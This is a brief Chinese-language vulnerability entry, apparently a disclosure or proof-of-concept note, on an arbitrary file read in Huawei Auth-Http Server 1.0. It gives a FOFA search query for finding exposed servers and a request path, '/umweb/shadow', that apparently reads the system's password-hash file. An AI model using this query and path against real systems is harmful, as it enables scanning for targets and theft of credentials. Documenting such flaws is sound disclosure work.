登录 白背景

华为Auth-Http Server 1.0存在任意文件读取

一、漏洞简介

华为Auth-Http Server 1.0存在任意文件读取漏洞

二、影响版本

  • 华为Auth-Http Server 1.0

三、资产测绘

  • fofaserver="Huawei Auth-Http Server 1.0"
  • 特征

image.png

四、漏洞复现

/umweb/shadow

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/idyr2darqkc3u2m2